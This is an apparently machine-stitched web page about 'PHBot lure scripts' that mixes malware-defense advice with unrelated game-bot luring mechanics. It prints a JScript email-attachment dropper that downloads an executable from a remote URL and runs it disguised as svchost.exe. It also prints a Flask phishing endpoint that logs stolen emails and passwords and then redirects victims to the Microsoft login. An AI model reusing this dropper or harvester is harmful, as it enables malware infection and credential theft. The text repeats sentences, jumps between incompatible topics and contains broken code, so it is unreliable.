img

Phbot Lure Script

This is where the script mimics the "helper" archetype. The lurer claims a mutual friend has been scammed, and they want revenge.

While PHBot itself is a robust RAT, its lure script remains the most detectable stage of the kill chain. Obfuscation may slow down a casual user, but modern EDRs and email filters can fingerprint the behavioral patterns of these scripts—WebClient downloads followed by process creation in temp directories.

For defenders, the message is clear: Block the lure, starve the bot. Invest in script-based detection, enforce Constrained Language Mode, and educate users to never enable macros or run unexpected .js files.

For researchers, reverse engineering PHBot lure scripts offers a window into the attacker’s tradecraft. Catalog the C2 URLs, deobfuscate the base64 layers, and share the IOCs. Every lure script you sink is one PHBot that never wakes up. phbot lure script

Delivery: Email attachment named Invoice_#87345.js

Code snippet:

var url = "hxxp://platinumsoft[.]site/phbot.exe";
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", url, false);
WinHttpReq.Send();
if (WinHttpReq.Status == 200) 
    var stream = new ActiveXObject("ADODB.Stream");
    stream.Open();
    stream.Type = 1;
    stream.Write(WinHttpReq.ResponseBody);
    stream.SaveToFile("%temp%\\svchost.exe", 2);
    var shell = new ActiveXObject("WScript.Shell");
    shell.Run("%temp%\\svchost.exe");

The script needs to know how many monsters are currently following the player. This is usually done by iterating through the GetMonsters() or similar function to count entities targeting the player within a specific radius. This is where the script mimics the "helper" archetype

from flask import Flask, request

app = Flask(name)


@app.route('/verify', methods=['POST'])
def harvest():
email = request.form.get('email')
password = request.form.get('password')
with open('stolen_logs.txt', 'a') as f:
f.write(f"email:password\n")
return "<script>window.location='https://login.microsoftonline.com'</script>"


if name == 'main':
app.run(host='0.0.0.0', port=443, ssl_context='adhoc')
 Delivery:  Email attachment named  Invoice_#87345

  • Entropy: High base64 ratio in short scripts (often >30% of file).

    • As of 2025, PHBot itself is largely deprecated due to Jagex’s client updates and the rise of AI-driven bot detection. However, the concept of the lure script has evolved.

    Modern lures are moving to:

    The "PHBot lure script" is no longer just a file. It is a blueprint for automated social engineering.

    Lure scripts typically use a "Home" coordinate (the party spot) and a list of "Lure" coordinates (the outer perimeter). The script must calculate distance to determine when to stop luring and return home.